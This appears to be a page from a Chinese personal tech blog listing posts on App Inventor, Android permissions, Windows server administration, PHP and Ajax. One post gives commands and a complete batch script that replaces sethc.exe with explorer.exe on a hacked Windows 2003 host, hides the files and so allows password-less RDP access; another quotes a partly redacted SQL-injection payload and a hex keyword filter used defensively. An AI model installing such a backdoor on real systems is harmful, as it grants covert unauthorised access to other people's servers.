2011年06月29日
by 江小邪
0 comments
最近在博客园看到一篇报道关于一个人好像是别出心裁的用android程序求婚,最后成功了,在留言部分看到很多园友说:好浪漫,好幸福;文章中提到的一个在线开发程序,叫做app invertor,于是在网上稍微看了一下,下班回到家之后马上下载,起先是用迅雷下载的,结果下载进度一点也不动,于是乎,***用IE9 下载,下载了两次没有成功,原因可能是保存路径有问题,建议先保存到桌面,然后再安装,下载地址如下http://dl.google.com/dl/appinventor/installers/windows/appinventor_setup_installer_v_1_2.exe(建议***);下载好之后安装就可以了,好像官方建议安装过程中的路径不要修改,以防在加载模拟器的时候找不到路径,当然你也可以自己定义路径,不过在使用模拟器的时候需要人工的输入模拟器的路径,以后就不会出现这种问题了,下面就可以进入按android的在线编辑页面了,请在浏览器的地址栏中输入:http://appinventor.googlelabs.com/ 就可以看到了,先放图···
第一次进入是会出现下面的界面,请点击new,并填写相应的项目名称即可,我填写的是First
进入First项目,界面如下 (更多…)
标签Tags:
android,
Android笔记,
div,
google,
上传,
属性,
工具,
幸福,
成功,
浏览器,
组件,
网站,
连接,
页面
Android笔记
2011年06月29日
by 江小邪
0 comments
android.permission.ACCESS_CHECKIN_PROPERTIES 允许读写访问 “properties”表在checkin数据库中,改值可以修改上传( Allows read/write access to the “properties” table inthe checkin database, to change values that get uploaded)
android.permission.ACCESS_COARSE_LOCATION 允许一个程序访问CellID或WiFi热点来获取粗略的位置(Allows an application to access coarse (e.g., Cell-ID, WiFi)location)
android.permission.ACCESS_FINE_LOCATION 允许一个程序访问精良位置(如GPS) (Allows an application to access fine(e.g., GPS) location)
android.permission.ACCESS_LOCATION_EXTRA_COMMANDS 允许应用程序访问额外的位置提供命令(Allows an application to access extra location provider commands)
android.permission.ACCESS_MOCK_LOCATION 允许程序创建模拟位置提供用于测试(Allows an application to create mock location providers fortesting) (更多…)
标签Tags:
access,
Android笔记,
大全,
应用程序,
数据库,
更新,
精华,
系统,
系统服务,
组件,
网站大流量问题,
连接
Android笔记
2010年07月28日
by 江小邪
0 comments
最近我的网站经常把js脚本注入到数据,清除了又来。先后在网上找了很多的方法,还是没有用的,十分恼火。
首先先告诉大家一个批量清除代码的sql语句。
update 表名 set 字段=replace(字段,’script src=http://3b3.org/c.js>
1、分析那些无聊的人,或者有些病态的人究竟做了些什么 。
通过iis的日志或者microsoft urlscan 日志查看,在一些通过id查询数据库内容的时候后面被人加了一段很长的字符窜。
%%3B%%44%%65%%43%%4C%%61%%52%%45%%类似这样的字符窜,一定是其他的方式编码
首先我们先用工具分析下如此之长的字符窜究竟包含了些什么内容。
通过批量替换工具把%%全部替换成空,然后把得到的字符串通过其他的转码工具,转成字符窜。
;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0×45这里代码去掉了06F007200 aS NvArChAR(4000));ExEc(@S);–
就是一段与通过id查询数据库同时执行的sql,就给数据库某些表的字段加入了js病毒连接。
2、所以我们的原来的防sql注入的字符串就需要升级了。
如果过滤16进制
; 对应 3B
DeCLaRE 对应 4465434C615245
@ 对应 40
NvArCHaR 对应 4E76417243486152
set 对应 536554
CaSt 对应 43615374
as 对应 6153
exec 对应 45784563
- 对应 2D
把16进制的代码用|隔开放到injdata 里面
injdata = “3B|2D|’|;|and|exec|insert|select|delete%20from|update|count|”
然后自己测试下,程序是否拦击了这些16进制的代码,本人测试过是可以拦击的,如果不加入这些是不拦击的
照样可以注入到数据库。
标签Tags:
ASP,
js,
sql,
url,
人,
代码,
工具,
数据,
数据库,
方法,
服务器构建&安全,
程序,
类,
网站,
诫,
连接,
防注入
服务器构建&安全
2010年07月28日
by 江小邪
0 comments
防止网卡被意外禁用,这个对大家可能没有多大的用途,但如果你有服务器托管在外面,那可就有用了,如果你那天不小心点到了“禁用”,呵呵,那后果我就不用说了吧,你的服务器马上就跟你说拜拜了,而且必须进入机房去重新启用网卡才可以(我就碰到了这样的倒霉事啊)。
闲话不多说,下面说重点:
实现的方法,用组策略来实现。
步骤:
1、运行——》gpedit.msc
2、导航至:用户配置——》管理模板——》网络——》网络连接
3.1、找到“禁止启用/禁用 LAN 连接的组件”,设置为“已启用”
3.2、找到“启用/禁用 LAN 连接的能力”,设置为“已禁用”
3.3、找到“为管理员启用 Windows 2000 网络连接设置”,设置为“已启用”
4、运行——》gpupdate /force
你现在检查一下本地连接的属性,“禁用”按钮已经变成灰色的不可用状态,这下你再也不用担心意外点中,让你的服务器跟你说拜拜了。
标签Tags:
属性,
方法,
服务器构建&安全,
模板,
策略,
组件,
连接
服务器构建&安全
2010年07月28日
by 江小邪
0 comments
来源:脚本安全小组
在肉鸡上执行命令
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
以后再连接肉鸡3389,敲5下shift键就可以直接进入了,无需输入密码,只是登陆上去没有任务栏,一直会有密码登陆框,不过够我们做很多事情了,目前win2003测试通过。
似乎2000也可以,XP不行。这两个系统没测试。
不知道有牛人知道是什么道理不.
小道消息:连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe ,你把explorer.exe换成sethc.exe 就是自动执行explorer.exe
Shift后门TT整理版
来源:TT’s Blog
将下面的代码保存为tt.bat 然后到主机上运行~后门的启动了~
然后连接对方3389然后连续按5次Shift就能进入盘里了 然后进入c:\windows\system32\cmd.exe
或者建个bat内容为 call cmd.xe 就是系统权限了~管理员把你先的用户删了也不怕~
哇哈哈哈哈~~~
TITLE Shift后门
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo 感谢您使用Shift后门
echo.
echo.
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit
标签Tags:
cache,
title,
人,
代码,
密码,
感谢,
方法,
服务器构建&安全,
系统,
连接
服务器构建&安全
2010年07月28日
by 江小邪
0 comments
由于windows2003默认仅支持2个终端用户的登陆。当“终端连接超出了最大连接”的情况出现导致不能登录时,可以:
1、在另外一台Windows2003的机器上运行“tsmmc.msc”,打开远程桌面连接,添加一个新的连接,输入远程服务器的IP地址、远程登录帐号和密码,登录到远程服务器桌面。这个方式可以随时登录到远程桌面。
2、在登录出问题的服务器上, 单击“开始”,指向“管理工具”,然后单击“终端服务配置”。
3、 单击“服务器设置”,然后双击“授权模式”。
4、将“授权模式”更改为“每用户”,然后单击“确定”。 以后就不会出现此类问题了。
原因:Window Server 2003 不管理“用户 CAL”。这就是说,即使许可证服务器数据库中有一个“用户 CAL”,它在被使用时也不会减少。这样就不会为了让每个用户都有一个有效的终端服务器 (TS) CAL 而根据“最终用户许可协议”(EULA) 的要求删除管理员。在没有使用“设备 CAL”的情况下,如果不是每个用户都有一个“用户 CAL”,就会违反 EULA。
标签Tags:
server,
密码,
工具,
数据,
数据库,
服务器构建&安全,
类,
解决,
连接
服务器构建&安全
2010年07月26日
by 江小邪
0 comments
Sockets在PHP中是没有充分利用的功能。今天你将看到产生一个能使用客户端连接的服务器,并在客户端使用socket进行连接,服务器端将详细的处理信息发送给客户端。
当你看到完整的socket过程,那么你将会在以后的程序开发中使用它。这个服务器是一个能让你连接的HTTP服务器,客户端是一个Web浏览器,这是一个单一的 客户端/服务器 的关系。 (更多…)
标签Tags:
PHP,
PHP,
php.ini,
server,
web,
代码,
函数,
区别,
实例,
应用程序,
成功,
操作系统,
数据,
注释,
浏览器,
程序,
类,
系统,
网络编程,
英文,
获取,
解决,
诫,
连接,
错误,
页面
PHP, 网络编程
2010年07月26日
by 江小邪
0 comments
不多说了,看代码。自己体会
<?php
echo “濙水河边的PHP演示”;
echo “<br>”;
$db=mysql_connect(“localhost”,”root”,”123456″);
mysql_select_db(“jaycee”,$db);
$rs=mysql_query(“select * from gbook”,$db);
while($row=mysql_fetch_row($rs))
{
echo <<< eod
<table width=”99%” border=”1″ cellspacing=”0″ cellpadding=”0″>
<tr>
<td>$row[0]</td>
<td>$row[1]</td>
</tr>
<tr>
<td>$row[2]</td>
<td>$row[3]</td>
</tr>
</table>
eod;
}
?>
<<<也就是可以让我们在PHP代码内实现一大段的HTML代码,并且可以在其中,使用PHP变量。
淡水河边这厮,找到许多PHP入门呀,php起步呀==的书,从没提到用到这个。郁闷,用不到么?
居然不提。愤怒! (更多…)
标签Tags:
html,
mysql,
PHP,
PHP,
sql,
代码,
函数,
区别,
常用,
数据,
数据库,
方法,
浏览器,
类,
网络编程,
诫,
连接
PHP, 网络编程
2010年07月26日
by 江小邪
0 comments
PHP实现对文本数据库的数据显示、加入、修改、删除、查询五大基本操作的方法
我用一个留言本程序作为例子,阐述PHP实现对文本数据库的数据显示、加入、修改、删除、查询五大基本操作的方法。
此文本数据库共有字段10个:客户IP、发言时间、客户名、客户EMAIL、客户主页地址、留言表情图片名、客户QQ、客户形象图片、留言内容、管理员回复内容。
1、加入数据程序段。
$date=date(“Y-m-d H:i:s”);//取得系统时间
$ip = $HTTP_SERVER_VARS[REMOTE_ADDR]; //取得发言的IP地址
$text=encode($gb_text);//去掉留言内容后面的空格.
$fp=fopen(“gb.dat”,”a”);//以只写模式打开gb.dat文本文件,文件指针指向文件尾部.
$str=$ip.” ”.$date.” ”.$gb_name.” ”.$gb_email.” ”.$gb_home.” ”.$face.” ”.$gb_qq.” ”.$head.” ”.$text.” ”.$reply.”\n”;//将所有留言的数据赋予变量$str,” ”的目的是用来今后作数据分割时的数据间隔符号。
fwrite($fp,$str);//将数据写入文件
fclose($fp);//关闭文件
showmessage(“留言成功!”,”index.php”,”3″);//留言成功,3秒后自动返回主界面。
其中的$gb_name 、$gb_email、$gb_home、$face、$gb_qq、$head、$gb_text、$reply是由发言表单传过来的数据。
(更多…)
标签Tags:
code,
PHP,
PHP,
server,
判断,
图片,
成功,
搜索,
数据,
数据库,
方法,
程序,
类,
系统,
网络编程,
获取,
表单,
诫,
连接,
页面
PHP, 网络编程
2010年07月26日
by 江小邪
1 comment
Ajax的核心是JavaScript对象 XmlHttpRequest。该对象在Internet Explorer 5中首次引入,它是一种支持异步请求的技术。简而言之,XmlHttpRequest使您可以使用JavaScript向服务器提出请求并处理响应,而不阻塞用户。
在创建Web站点时,在客户端执行屏幕更新为用户提供了很大的灵活性。下面是使用Ajax可以完成的功能:
* 动态更新购物车的物品总数,无需用户单击Update并等待服务器重新发送整个页面。
* 提升站点的性能,这是通过减少从服务器下载的数据量而实现的。例如,在Amazon的购物车页面,当更新篮子中的一项物品的数量时,会重新载入整个页面,这必须下载32K的数据。如果使用Ajax计算新的总量,服务器只会返回新的总量值,因此所需的带宽仅为原来的百分之一。
* 消除了每次用户输入时的页面刷新。例如,在Ajax中,如果用户在分页列表上单击Next,则服务器数据只刷新列表而不是整个页面。
* 直接编辑表格数据,而不是要求用户导航到新的页面来编辑数据。对于Ajax,当用户单击Edit时,可以将静态表格刷新为内容可编辑的表格。用户单击Done之后,就可以发出一个Ajax请求来更新服务器,并刷新表格,使其包含静态、只读的数据。
一切皆有可能!但愿它能够激发您开始开发自己的基于Ajax的站点。然而,在开始之前,让我们介绍一个现有的Web站点,它遵循传统的提交/等待/重新显示的范例,我们还将讨论Ajax如何提升用户体验。 (更多…)
标签Tags:
ajax,
html,
ie,
javascript,
JavaScript&Ajax,
status,
url,
web,
xml,
xmlhttp,
代码,
兼容,
函数,
分页,
容器,
对象,
属性,
常用,
应用程序,
引入,
数据,
方法,
更新,
浏览器,
程序,
系统,
网络编程,
节点,
表格,
诫,
说明,
连接,
页面
JavaScript&Ajax, 网络编程